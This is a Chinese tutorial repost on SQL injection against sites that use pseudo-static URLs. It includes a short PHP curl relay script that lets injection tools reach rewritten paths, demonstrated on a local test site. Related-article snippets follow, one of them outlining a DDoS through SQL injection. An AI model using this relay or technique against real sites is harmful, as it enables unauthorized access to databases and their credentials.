对伪静态网站实施注射

伪静态网站注入方法，莱鸟扫盲来了哦，通常情况下，动态脚本的网站的url类似下面这样：

http://www.91ri.org/news.php?id=111

做了伪静态之后就成这样了

http://www.91ri.org/news.php/id/111.html

以斜杠“/”代替了“=”并在最后加上.html，这样一来，就无法直接用工具来注入了，

现在我们就来讨论下如何用工具来注入，大家都知道cookies注入中转吧，其实原理都差不多，

我们自己写一个动态网页脚本，构造自己的url规则，通过这个页面中转来访问目标页！

即我们把伪静态url规则变回原来的?id=123这样的形式，形成一个普通的可方便注入的url。

好吧，试验下！我在本地用thikphp搭建了一个简单的注入点，

因为thinkphp自带了简单的伪静态，比较方便演示。

这个注入点的sql如下：接收get过来的id

SELECT account AS username,password FROM think_user WHERE id=1

页面url如下：

http://www.91ri.org/index.php/index/index/id/111.html

变幻111的值来注入！

我比较熟悉php，就用php来写一个注入中转页面吧

tmd.php 中转页面源码：

set_time_limit(0);
$id=$_GET[“id”];
$id=str_replace(” “,”%20”,$id);
$id=str_replace(“=”,”%3D”,$id);
//$url = “http://www.91ri.org/test/id-$id.html“;
$url = “http://www.91ri.org/inj/index.php/index/index/id/$id.html“;
//echo $url;

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, “$url”);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);

将这个文件保存成tmd.php即可，这个文件url如下：

http://www.91ri.org/inj/tmd.php

把产生注入的$id根据目标页的伪静态规则放到指定的位置就可以了。如上。

原理就是通过curl来取得目标页的内容（与直接访问目标页效果一样），

只需要修改$url的内容就可以适应各种伪静态规则了。

脚本比较简陋，有需要的童鞋，可根据情况加入post方式，代理，referer等功能。

我们现在访问 http://www.91ri.org/inj/tmd.php?id=111，

即相当于访问 http://www.91ri.org/inj/index.php/index/index/id/111.html ，

现在我们就可以把 http://www.91ri.org/inj/tmd.php?id=111 这个连接放到工具里面注入了。

本文作者不明(转载时未见原作者版权)由网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理.

时间： 2024-08-04 22:46:00

对伪静态网站实施注射的相关文章

关于伪静态网站的好处

百度蜘蛛喜欢静态网站,所以一些技术人员在使用其它程序建站时也会采取一些方法将其处理成伪静态的形式.网站伪静态故名思议,就是不会生成实体的静态页面文件,它只是以.html一类的静态页面形式,且用PHP程序动态脚本来处理的就是网站伪静态,它是大多seoer所关心的话题. 网站伪静态有哪些好处,可以从哪些方面来考虑呢,合肥网站建设给您一一讲解. 可以提高用户对主页的信任度.这点是非常重要的.因为伪静态的后缀方式大都雷同,所以很容易让辨别它是伪静态还是静态.如果是伪静态,不但可以大大提高用户的信用度,而

linux系统下对网站实施负载均衡+高可用集群需要考虑的几点

随着linux系统的成熟和广泛普及,linux运维技术越来越受到企业的关注和追捧.在一些中小企业,尤其是牵涉到电子商务和电子广告类的网站,通常会要求作负载均衡和高可用的Linux集群方案. 那么如何实施linux集群架构,才能既有效保证网站健康运行,又能节省运维成本呢?下面依据近几年的运维经历,简单梳理下自己的一点感悟. (1)机房的选择如果有自己公司的机房那是再好不过的了:如果没有,建议放在BGP机房内托管,如果有选择的话,最好是选择带有硬件防火墙的机房,这样在安全方面也有保障:网站如若是放在

[错误代码：0x80070002]IIS7及以上伪静态报错404

故障现象:DTCMS开启伪静态功能,VS2010预览正常,发布到IIS后报错404.0错误 (WIN7,WIN8,SERVER2008).模块IISWebCore通知MapRequestHandler处理程序StaticFile错误代码 0x80070002关闭URL重写(伪静态)网站... 故障现象:DTCMS开启伪静态功能,VS2010预览正常,发布到IIS后报错404.0错误(WIN7,WIN8,SERVER2008). 模块 IIS Web Core 通知 MapRequestHandl

通过SQL注入实施DDOS攻击的方法

在这之前,我先介绍一下此方法的思路和原理,以便让大家更好地理解这种攻击方法.我们知道,如果一个网站存在sql注入漏洞,那么我们就能让网站数据库执行我们的sql语句,并得到相应的输出(当然,有些情况下是没有回显的).所以我们有了一个思路:构造一条足够复杂的sql语句,让数据库去执行,以此来消耗Web服务和数据库的资源,耗尽服务器资源,我们甚至也可以让数据库达到其最大连接数,让数据库不能再去回应其它合法用户的连接请求. 目前,整个思路已经很清晰了,我们可以开始构造复杂的sql语句了. sql为我们提

IIS7及以上伪静态报错404

内容摘要:故障现象:DTCMS开启伪静态功能,VS2010预览正常,发布到IIS后报错404.0错误(WIN7,WIN8,SERVER2008).模块IISWebCore通知MapRequestHandler处理程序StaticFile错误代码0x80070002关闭URL重写(伪静态)网站... 故障现象:DTCMS开启伪静态功能,VS2010预览正常,发布到IIS后报错404.0错误(WIN7,WIN8,SERVER2008). 模块 IIS Web Core 通知 MapRequestHa

SharePoint 2013跨网站集发布功能简介

在SharePoint Server 2013网站实施中,我们经常会遇到跨网站集获取数据,而2013的这一跨网站集发布功能,正好满足我们这样的需求. 使用SharePoint 2013中的跨网站发布,我们可以使用列表和其他库来存储在发布网站上重复使用的内容,通过内容搜索部件来读取配置的跨网站集信息,下面,让我们通过一个简单的例子,了解一下这一功能吧! 1.使用SharePoint 2013跨网站集发布功能,首先需要在源网站和目标网站开启Cross-Site Collection Publishi

如何防止ASP.NET网站遭受CSRF的攻击

转载地址: http://www.cnblogs.com/shanyou/p/5038794.html?hmsr=toutiao.io&utm_medium=toutiao.io&utm_source=toutiao.io CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF.CSRF(Cross Site Request Forger

网站常见的入侵手段和防御方法

网站入侵技术大概有以下几种: 1.上传入侵上传入侵便是通过上传文件来获得权限,针对有上传文件权限的网站实施,好比论坛可以上传附件.资讯站可以投稿上传图片,这些都可能为上传木马提供便利,上传木马以后,很多信息都会轻松暴露出来的.这个漏洞在网站源码中比较常见,被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高. 防御方法:第三方开源代码要及时升级官方提供的程序补丁:注意对上传的文件进行限制,例如限制文件类型.文件尺寸等,同时要对上传文件以后存储的文件夹进行权限限制,好比

网站非法经营之“罪”

导语前不久,在国务院主持召开的经济形势座谈会上,李克强总理公开赞许马云:“你们创造了一个消费时点”,以此高度肯定了以淘宝网为代表的电子商务在新经济中的影响力.事实上,个人站长这一“互联网个体户”对互联网创业所带来的积极意义,丝毫不亚于网商.然而,个人站长在创业阶段,不仅曾有繁琐的工商注册手续,甚至还要面对“非法经营”的罪名. 小舍本专题策划/制作者[email protected] 有站长称,网站遭竞争对手“恶意报复”,被举报网站无经营性备案手续,网站被封停,涉案站长涉嫌非法经营,面临6位数